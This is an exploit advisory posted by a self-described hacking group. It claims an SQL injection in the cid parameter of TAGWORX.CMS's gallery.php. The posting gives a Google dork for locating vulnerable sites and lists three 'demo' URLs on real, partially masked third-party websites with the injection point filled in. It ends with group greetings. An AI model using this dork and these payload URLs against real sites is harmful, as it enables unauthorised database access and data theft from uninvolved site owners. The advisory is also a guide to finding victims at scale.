<!-- ________ .__ __________________ \_ ___ \_______|__| _____ \_____ \______ \ / \ \/\_ __ \ |/ \ _(__ <| _/ \ \____| | \/ | Y Y \/ \ | \ \______ /|__| |__|__|_| /______ /____|_ / \/ \/ \/ \/ M3Mb3R OF AjaxTm --> ###### # Exploit Title: TAGWORX.CMS CMS (gallery.php) sql injection # Google Dork: "Powered by <TAGWORX.CMS />" # Date: 9/7/2012 # Author: Ajax Security Team # Discovered By: Crim3R # Home: WwW.AjaxTm.CoM # Vendor Software: http://www.jajitech.net/ # Version: All Version # Category:: webapps # Tested on: GNU/Linux Ubuntu - Windows Server - win7 ###### ================================== sqli [+] gallery.php?cid=[id][sqli]&pid=[id] D3m0: http://www.dr-scXXXtzlseer.de/gallery.php?cid=124'&pid=124 http://www.weiXXXenchen.de/gallery.php?cat_id=17&cid='&pid=&img=1 http://www.lebeXXXtanz.com/gallery.php?cid=124'&pid=124 ===============Crim3R@Att.Net========= [+] Greetz to All Ajaxtm Security Member Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal devilzc0der - Dominator - Hossein.R1369